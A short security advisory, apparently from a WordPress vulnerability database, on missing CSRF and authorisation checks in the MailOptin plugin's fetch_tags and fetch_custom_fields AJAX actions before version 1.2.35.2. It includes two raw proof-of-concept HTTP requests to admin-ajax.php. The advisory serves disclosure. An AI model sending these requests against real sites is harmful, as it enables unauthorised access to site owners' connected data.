MailOptin < 1.2.35.2 – Unauthorised AJAX Call

Description

The fetch_custom_fields and fetch_tags function did not have proper CSRF check and authorisation, allowing unauthorised users to call the related AJAX action via either low privilege account or CSRF attack

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close
Cookie: [low privilege user/CSRF attack]

action=mo_elementor_fetch_tags&connection=CleverReachConnect


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Connection: close
Cookie: [low privilege user/CSRF attack]

action=mo_elementor_fetch_custom_fields&connection=CleverReachConnect&connection_email_list=a